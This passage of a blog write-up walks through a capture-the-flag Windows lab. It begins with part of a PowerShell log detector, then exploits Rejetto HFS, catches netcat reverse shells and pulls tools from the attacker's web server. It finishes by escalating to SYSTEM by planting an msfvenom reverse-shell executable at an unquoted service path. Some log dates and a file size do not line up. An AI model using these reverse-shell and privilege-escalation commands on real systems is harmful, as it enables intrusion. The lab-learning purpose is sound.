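                Client  = $ip
                Macro   = $Matches['macro']                  # 'save' and 'exec' in the script above
                Decoded = ($decoded -replace '\x00', '<NUL>')
            }
        }
    }
}

# Expected: three hits from 10.0.0.9 (save, exec, exec). The two benign searches are ignored,
# including the one that legitimately contains braces but no NUL byte.
Get-HfsMacroInjection -Lines ($SampleLog -split "`r?`n") | Format-Table -AutoSize -Wrap
```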
To start things off, download the netcat static binary and rename it to nc.exe to match the exploit. Then serve it by running the following from the directory that holds the netcat binary.
```
$: python3 -m http.server 8080
```
Also start listening on port 443.
```
$: sudo rlwrap nc -nlvp 443
listening on [any] 443 ...
```
Now it's time to try out the exploit.
```
$: python2 exploit.py $target 8080
```
There is no output from the script, but in the Python web server we see a GET request for the netcat binary.

```
$target - - [23/May/2021 19:00:54] "GET /nc.exe HTTP/1.1" 200 -
```
Looks good!
And in the listener we see something that should make us smile.
```
connect to [$tunip] from (UNKNOWN) [$target] 49391
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
```
We are in!
Congratulations, we're now onto the system. Now we can pull winPEAS to the system using powershell -c.
Once we run winPEAS, we see that it points us towards unquoted paths. We can see that it also provides us with the name of the service that is running.
What powershell -c command could we run to manually find out the service name?
```
powershell -c "Get-Service"
```
Now let's escalate to Administrator with our new found knowledge.
Generate your payload using msfvenom and pull it to the system using powershell.
The format is powershell -c "command here".
Download the winPEAS script to web server directory.
```
$: wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
```
Make sure that the Python web server is up and running.
```
cd C:\Users\bill\Desktop
C:\Users\bill\Desktop> powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/winPEAS.bat' -OutFile 'C:\Users\bill\Desktop\winPEAS.bat'"
```
In the web server we see a GET request.
```
$target - - [07/Feb/2021 22:27:52] "GET /winPEAS.bat HTTP/1.1" 200 -
```

And on the target:

```
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\Desktop

05/23/2021  10:11 AM    <DIR>          .
05/23/2021  10:11 AM    <DIR>          ..
05/23/2021  09:05 AM            73,802 ASCService.exe
05/23/2021  08:28 AM           494,731 PowerUp.ps1
09/27/2019  05:42 AM                70 user.txt
05/23/2021  10:11 AM            35,107 winPEAS.bat
               4 File(s)        603,710 bytes
               2 Dir(s)  44,150,620,160 bytes free
```
It worked. Let's run winPEAS.bat.
```
winPEAS.bat
...
 [+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe STEELMOUNTAIN\bill:(I)(RX,W)
C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)
...
```
A very long and familiar output. Since we did all of this before and know what to do, there is no need to go through it again.
Time to bake up some malicious code.
```
$: msfvenom -p windows/shell_reverse_tcp LHOST=$tunip LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: ASCService.exe
```
Start a listener.
```
$: nc -nlvp 1234
listening on [any] 1234 ...
```
Stop AdvancedSystemCareService9.
```
sc stop AdvancedSystemCareService9
```
Pull the payload onto the target. Note that this time the command fetches it as Advanced.exe and drops it directly in C:\Program Files (x86)\IObit\ rather than overwriting ASCService.exe, so rename the generated executable on the web server to match. Because the service's image path is unquoted, Windows tries C:\Program Files (x86)\IObit\Advanced.exe before it gets to the real binary in the "Advanced SystemCare" folder.

```
powershell -c "Invoke-WebRequest -Uri 'http://$tunip:8080/Advanced.exe' -OutFile 'C:/Program Files (x86)/IObit/Advanced.exe'"
```
Finally, start AdvancedSystemCareService9.
```
sc start AdvancedSystemCareService9
```
In our listener:
```
connect to [$tunip] from (UNKNOWN) [$target] 49431
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```
Conclusion
Phew! This was not easy for me. I had to lean quite a bit on Zach Heller's writeup of this room for some tasks.
My lack of Windows know-how and particular Powershell skills crippled me in this challenge. Need more experience.
I realized early on that it would take me a long time to solve this on my own so I took the liberty of doing some googling and decided to make this a learning experience instead of a challenge.
It felt a bit like copy-paste "hacking" but it feels like I acquired new skills and experience along the way. I think a similar challenge would be a lot easier for me now.
The exploits were easy enough to understand and while I cheated I feel that I understand everything reasonably well in hindsight. I try my best to not just copy commands and get the flags but instead understand what I'm doing and why.
These themed challenges... While it's fun and flashy, hacking is in essence dry and "boring", so these themes at times feel a little forced. Sometimes it works well, but when the theme consists of some usernames and a front page on a web server, I don't know...
Metasploit
One good thing is that I'm getting more and more comfortable using Metasploit!
Speaking of which, Metasploit is not supported in Pygments and I'm not completely happy with the current output using console but it will have to be good enough for now.
One major annoyance is that I couldn't get the windows/meterpreter/reverse_tcp payload working while using the windows/http/rejetto_hfs_exec exploit so I had to start a netcat listener outside of Metasploit and then it worked just fine. It would have been nice to solve the first part of this challenge completely inside Metasploit and the most annoying part is that I have no idea why this didn't work.
Offensive Pentesting path
Since I decided to write a blog post on every room in the Offensive Pentesting path I had to re-do the challenges up to and including Steel Mountain.
While re-doing challenges is probably very beneficial for your learning, it's not that much fun. But now I'm at last up to speed, so on to some new challenges!
More to come.
Tools used
- (Firefox)
- Nmap
- Searchsploit/Exploit-DB
- Metasploit
- Rejetto HTTP File Server (HFS) RCE exploit for Metasploit (exploit/windows/http/rejetto_hfs_exec)
- PowerShell
- PowerUp.ps1
- MSFvenom
- Netcat
- Rejetto HTTP File Server (HFS) 2.3.x - RCE (2) Python script
- Python (python3 -m http.server 8080)
- winPEAS
- rlwrap